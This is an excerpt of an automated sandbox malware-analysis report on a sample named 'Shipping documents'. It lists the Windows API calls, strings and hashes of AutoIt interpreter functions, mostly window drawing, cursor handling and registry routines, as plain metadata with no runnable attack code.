                                                                                                          • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                          Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                          • DeleteObject.GDI32(?), ref: 00459551
                                                                                                          • DestroyWindow.USER32(?), ref: 00459563
                                                                                                          • GetDesktopWindow.USER32 ref: 00459581
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                          • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                          • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                          • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                          • _wcslen.LIBCMT ref: 00459916
                                                                                                          • _wcscpy.LIBCMT ref: 0045993A
                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                          • GetDC.USER32(00000000), ref: 004599FC
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                          • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                          • API String ID: 4040870279-2373415609
                                                                                                          • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                          • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                          • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                          • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                          Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                          • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                          • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                          • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                          • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                          • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                          • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                            • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                            • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                            • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                            • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                            • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                            • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                            • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                            • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 69173610-0
                                                                                                          • Opcode ID: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                                                                          • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                          • Opcode Fuzzy Hash: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                                                                          • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                          Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                          • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                          • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                          • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                          • API String ID: 2910397461-517079104
                                                                                                          • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                          • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                          • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                          • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                          Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp
                                                                                                          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                          • API String ID: 1038674560-3360698832
                                                                                                          • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                                                          • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                          • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                                                          • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                          Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                          • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                          • SetCursor.USER32(00000000), ref: 00430773
                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                          • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                          • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                          • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                          • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                          • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                          • SetCursor.USER32(00000000), ref: 00430803
                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                          • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                          • SetCursor.USER32(00000000), ref: 00430833
                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                          • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                          • SetCursor.USER32(00000000), ref: 00430863
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                          • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                          • SetCursor.USER32(00000000), ref: 00430887
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                          • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor$Load
                                                                                                          • String ID:
                                                                                                          • API String ID: 1675784387-0
                                                                                                          • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                          • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                          • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                          • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                          Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                          • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                          • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                          • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                          • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                          • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                          • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                          • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                          • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                          • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                          • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                          • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                          • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                          • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                          • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                          • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                          • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 1582027408-0
                                                                                                          • Opcode ID: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                                                                          • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                          • Opcode Fuzzy Hash: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                                                                          • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                          Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseConnectCreateRegistry
                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                          • API String ID: 3217815495-966354055
                                                                                                          • Opcode ID: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                                                                                                          • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                          • Opcode Fuzzy Hash: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                                                                                                          • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                          Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                          • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                          • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                          • DestroyWindow.USER32(?), ref: 00456746
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                          • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                          • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                          • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                          • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                          • String ID: ($,$tooltips_class32
                                                                                                          • API String ID: 225202481-3320066284
                                                                                                          • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
